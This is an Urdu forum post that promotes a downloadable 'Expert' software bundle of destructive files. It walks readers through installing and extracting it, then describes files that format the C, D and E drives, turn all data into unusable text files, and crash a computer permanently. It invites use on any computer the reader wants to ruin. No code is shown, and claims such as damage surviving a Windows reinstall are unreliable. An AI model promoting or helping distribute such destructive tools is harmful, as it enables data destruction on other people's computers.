دوستوکل میں نےایک تھریڈ
کےنام سےبنایاMera ye software yaad rakhna
جوقافی دوستوں کو سمجھ نہیں آئی۔آج میں اس کا تفصیل
سےآپ کوبتاؤں گا۔توچلوشروع کرتےہیں۔
سب سےپہلےیہ سافٹ ویئرڈاؤنلوڈکرلیں۔
سافٹ ویئرانسٹال کرنےکےبعداس پاتھ پرپہنچ جائیں۔
C:/Program files/Expert/Expert.zip
زپ والا فولڈر ایکسٹریکٹ کریں۔
ایکسٹریکٹ کرنےکےبعدفولڈراوپن کریں۔
*****DETEILS*****
CDEdrivedel
اس فائل کواوپن کرنےسےآپ کےکمپیوٹرکے سی،ڈی اورای ڈرائیوز3سیکنڈمیں فارمیٹ ہوجائیں گے۔
Change Use۔۔۔۔۔۔۔۔۔
فائل کواوپن کرنےسےآپ کےکمپیوٹرکاتمام ڈیٹانان ورکنگ ٹیکسٹ فائل میں کنورٹ ہوجائےگا۔
Crash PC
اس فائل کو اوپن کرنے سےآپ کا کمپیوٹرکریش ہوجائےگا۔مستقل طورپر۔دوبارہ کبھی ٹھیک نہیں ہوگا۔چاہےونڈو بھی نئی کرلیں۔
اسی طرح تمام فولڈرزمیں الگ الگ فائل ہے جس کا الگ الگ کام ہے۔فائل کےساتھ ایک تصویر ہےجس پرفائل کی ڈیٹیل لکھی ہوئی ہے۔
دوستوآپ سے گزارش ہےکہ اس کواپنے کمپیوٹرپرکوئی فائل بھی اوپن نہ کرنا اور نہ ہی کسی دوست کو تنگ کرنا اس فائل کے زریعے۔صرف اس کمپیوٹر پرفائل اوپن کریں جن کوآپ مستقل طورپربےکارکرناچاہتےہیں۔
اب کوئی بھی فائل استعمال کرنا آپ کی زمہ داری ہوگی۔
امید ہےآپ کو میرا تھریڈ پسند آئےگا۔
Bookmarks